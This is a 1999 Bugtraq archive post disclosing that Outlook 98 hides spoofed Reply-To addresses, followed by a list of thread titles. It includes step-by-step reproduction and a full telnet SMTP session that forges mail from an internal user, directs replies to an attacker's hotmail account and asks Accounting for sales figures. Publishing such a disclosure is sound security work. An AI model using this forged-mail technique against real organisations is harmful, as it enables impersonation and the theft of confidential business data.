Bugtraq mailing list archives
Outlook 98 allows spoofing internal users
From: nate () root org (Nate Lawson)
Date: Tue, 20 Apr 1999 15:10:05 -0700
Problem: Outlook uses a sender's Reply-To address silently, allowing a user to inadvertently send data to an Internet mail account when intending to reply to an internal, trusted user. Impact: Anyone on the Internet can spoof a trusted internal Exchange user and get replies sent back to themself without the user knowing they weren't responding to another internal user. How to reproduce: 1. Spoof mail as an internal user with a Reply-To address claiming to be an internal user, but an address of an Internet account, say hotmail. 2. Go into Outlook and read the mail. The mail looks like it was internally generated but viewing the full Internet headers under View->Options shows the bogus Reply-To header. 3. Hit Reply in Outlook. The To: field looks like it's going to a valid internal user, but right clicking on it and choosing Properties shows that the internal user it is sending the reply to is actually an Internet address. 4. Enter some text and hit Send. Observe that the mail went to the attacker's account, not the internal one. A quick script: {root 5:00pm} ~> telnet mail.example.com 25 Trying 10.20.2.5... Connected to mail.example.com. Escape character is '^]'. 220 mail.example.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready helo losebag 250 OK mail from:<> 250 OK - mail from <> rcpt to:<accounting () example com> 250 OK - Recipient <accounting () example com> data 354 Send data. End with CRLF.CRLF From: Nate Lawson To: Accounting Reply To: Nate Lawson<intruder () hotmail com> Subject: important! Please reply with the latest copy of our sales figures! Thanks, Nate . 250 OK quit 221 closing connection Connection closed by foreign host. Now, a reply to the email will go not to the trusted internal user Nate Lawson <nlawson () example com> but to the attacker, <intruder () hotmail com>. Worse, the user sees no indication that the mail is outward-bound! The To: field on the reply simply shows "Nate Lawson", a valid internal user. Affected programs: Only tested on Outlook 98 Known use of this bug to get confidential information: none yet Suggested Fix: always show the full email address of any recipient that is not local (i.e. username () example com would be hidden but any instance of user () hotmail com would be shown) Microsoft has been notified, but claimed this was a weakness in SMTP and would not be fixed until a secure successor to SMTP is implemented. They obviouly missed the point -- the error is not in that mail can be forged, but that Outlook allows a user to respond to a message that looks local and legitimate, but is actually destined for an outside address. -Nate
Current thread:
- Re: Bash Bug, (continued)
- Re: Bash Bug Marc Lehmann (Apr 21)
- Re: Bash Bug Pavel Kankovsky (Apr 22)
- Re: Bash Bug Chet Ramey (Apr 22)
- L0pht Security Advisory: Cold Fusion App Server Weld Pond (Apr 21)
- Re: Plain text passwords--necessary Densin Roy. (Apr 19)
- Re: Plain text passwords--necessary Daniel Alex Finkelstein (Apr 19)
- AOL Instant Messenger URL Crash Adam Brown (Apr 19)
- Re: AOL Instant Messenger URL Crash Daniel Reed (Apr 20)
- Shopping Carts exposing CC data Joe (Apr 19)
- Re: Shopping Carts exposing CC data Joe (Apr 20)
- Outlook 98 allows spoofing internal users Nate Lawson (Apr 20)
- Re: Outlook 98 allows spoofing internal users Peter van Dijk (Apr 25)
- Re: Shopping Carts exposing CC data Louis R. Marascio (Apr 20)
- eBay password stealing with JavaScript Michael K. Sanders (Apr 20)
- Re: eBay password stealing with JavaScript Paul Festa (Apr 21)
- Bug in Linux Mount Jacek Konieczny (Apr 20)
- Re: Bug in Linux Mount Meelis Roos (Apr 20)
- Re: Plain text passwords--necessary Tom Perrine (Apr 20)